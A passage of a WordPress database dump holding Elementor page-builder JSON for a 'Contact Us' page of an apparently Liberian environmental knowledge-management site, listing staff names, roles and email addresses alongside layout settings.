href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:Kamara.ed14@gmail.com\\\">Kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamag@gmail.com <\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14785,2345,'_elementor_edit_mode','builder'),(14786,2345,'_elementor_template_type','wp-page'),(14787,2345,'_elementor_version','2.7.5'),(14788,2345,'_wp_page_template','default'),(14789,2345,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:Kamara.ed14@gmail.com\\\">Kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamag@gmail.com <\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14793,2346,'_elementor_edit_mode','builder'),(14794,2346,'_elementor_template_type','wp-page'),(14795,2346,'_elementor_version','2.7.5'),(14796,2346,'_wp_page_template','default'),(14797,2346,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a 